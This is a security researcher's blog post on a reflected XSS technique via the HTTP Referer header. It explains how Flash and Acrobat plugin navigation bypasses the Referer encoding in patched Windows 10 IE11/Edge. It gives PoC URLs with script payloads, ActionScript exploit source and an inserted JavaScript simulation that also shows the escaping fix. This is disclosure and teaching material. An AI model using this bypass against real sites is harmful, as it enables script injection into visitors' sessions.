Thursday, October 6, 2016

XSS via Referrer After Anniversary Update

Since the Windows 10 anniversary update, it seems that Microsoft killed some XSS tricks on IE11/Edge. The referrer behavior is one of them.

The following page writes the HTTP_REFERER and document.referrer directly:
https://vulnerabledoma.in/xss_referrer

Previously, IE/Edge did not percent-encode the characters " < > in the Referer string, so that page could be XSSed from the following PoC:
https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>

But since the Windows 10 anniversary update, IE11/Edge encode them. That page now shows the following encoded strings:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Too bad!
Of course, we can still use IE11 on Windows 8.1/7. But we want XSS on Windows 10 too, don't we? :D

Today, I would like to introduce a small technique: XSS using the referrer on the latest Win10 Edge/IE11.

The technique is very simple. You can easily get the characters " < > into the Referer if you send the request from Flash's navigateToURL() method, like this:

https://l0.cm/xss_referrer.swf?<script>alert(1)</script>

The ActionScript code is here:
package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite {
  public function xss_referrer() {
   // Target page that reflects the Referer header.
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   // Navigate the current window to the target. The Referer the browser sends
   // is the URL of the page embedding this SWF, including its raw query string.
   navigateToURL(url, "_self");
  }
 }
}
As you can see from the result of that access, we can XSS via the Referer request header. But sadly, we cannot XSS via the document.referrer property, because it becomes empty. Dang :p
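To make the three cases concrete (normal navigation on patched IE11/Edge, plugin-initiated navigation, and a fixed reflecting page), here is an added example in JavaScript. It is not code from the original post and not the real source of https://vulnerabledoma.in/xss_referrer; the encoding set (" < > only, as shown in the output above), the empty document.referrer after a plugin navigation, the function names and the markup are assumptions for illustration.

```javascript
// Added example, not from the original post. Models the behaviour described
// above: a page reflecting HTTP_REFERER unescaped, the Referer encoding that
// patched IE11/Edge apply, a plugin-originated navigation that bypasses it,
// and the server-side fix (HTML-escape the header before reflecting it).

// Encoding observed in the post: " -> %22, < -> %3C, > -> %3E.
// '(' ')' and '/' were left alone, so the model only touches these three.
const REFERER_ENCODING = { '"': "%22", "<": "%3C", ">": "%3E" };

// Navigation started by the browser itself (link, form, location.href) on a
// patched Win10 IE11/Edge: Referer header and document.referrer both encoded.
function browserNavigation(fromUrl) {
  const encoded = fromUrl.replace(/["<>]/g, (c) => REFERER_ENCODING[c]);
  return { referer: encoded, documentReferrer: encoded };
}

// Navigation started by a plugin (Flash navigateToURL / Acrobat submitForm):
// the Referer header carries the raw URL, but document.referrer on the landing
// page is empty. (Assumption modelled on what the post reports.)
function pluginNavigation(fromUrl) {
  return { referer: fromUrl, documentReferrer: "" };
}

// Vulnerable endpoint: reflects the Referer header straight into the HTML.
function vulnerableReferrerPage(referer) {
  return "HTTP_REFERER: " + referer;
}

// Minimal HTML escaper for an HTML text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened endpoint: same output, but the untrusted header is escaped.
function hardenedReferrerPage(referer) {
  return "HTTP_REFERER: " + escapeHtml(referer);
}

// Client-side sink: what a page doing document.write(document.referrer) emits.
function documentReferrerSink(documentReferrer) {
  return "document.referrer: " + documentReferrer;
}

// Rough oracle for this demo: does the rendered text contain a live <script>
// tag? Not a general XSS detector, just enough to tell the cases apart.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Run one scenario and report whether each sink fired.
function simulate(attackerUrl, navigate, renderServerPage) {
  const nav = navigate(attackerUrl);
  const serverHtml = renderServerPage(nav.referer);
  const clientHtml = documentReferrerSink(nav.documentReferrer);
  return {
    referer: nav.referer,
    serverXss: containsScriptTag(serverHtml),
    clientXss: containsScriptTag(clientHtml),
  };
}

// The old PoC URL from the post, used as the attacker-controlled page URL.
const OLD_POC_URL = 'https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>';

const cases = [
  ["browser -> vulnerable page", browserNavigation, vulnerableReferrerPage],
  ["plugin  -> vulnerable page", pluginNavigation, vulnerableReferrerPage],
  ["plugin  -> hardened page  ", pluginNavigation, hardenedReferrerPage],
];
for (const [label, nav, render] of cases) {
  const r = simulate(OLD_POC_URL, nav, render);
  console.log(`${label}: Referer=${r.referer}`);
  console.log(`    server-side XSS=${r.serverXss}, document.referrer XSS=${r.clientXss}`);
}
```

The first case reproduces the encoded Referer shown above character for character; the second fires only the server-side sink, matching the observation that document.referrer is empty after a plugin navigation; the third shows that escaping the header on output closes the hole regardless of what the client sends, which is the fix the reflecting page actually needs, since relying on browser-side encoding of the Referer is what the plugin path defeats.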

FYI, I can also reproduce it via the submitForm() method of the Acrobat JavaScript API.

I confirmed it on Win10 IE11 with Adobe Reader plugin.

PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>

It seems that requests sent via plugins were not considered when this encoding was added.

That's it. It might be helpful in some cases :)
Thanks!
